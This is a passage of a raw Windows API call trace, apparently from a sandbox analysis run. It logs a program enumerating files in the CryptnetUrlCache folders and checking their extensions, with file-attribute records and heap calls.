ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0206.585] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0206.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.585] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0206.586] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0206.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.586] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x64b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0206.586] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0206.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.586] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0206.586] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0206.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.586] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0206.586] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0206.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.586] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0206.586] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77b90 | out: hHeap=0x2c0000) returned 1 [0206.587] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.587] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.587] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0206.587] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0206.587] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.587] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.587] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.587] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.587] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.587] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.587] PathFindFileNameW (pszPath="") returned="" [0206.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77ad8 | out: hHeap=0x2c0000) returned 1 [0206.590] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.591] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0206.591] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0206.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.591] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0206.591] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0206.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.591] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0206.591] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0206.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.591] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0206.591] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0206.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.591] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0206.591] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0206.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.591] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0206.591] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0206.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.591] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0206.591] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0206.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.591] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0206.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0206.592] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0206.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0206.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.593] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | 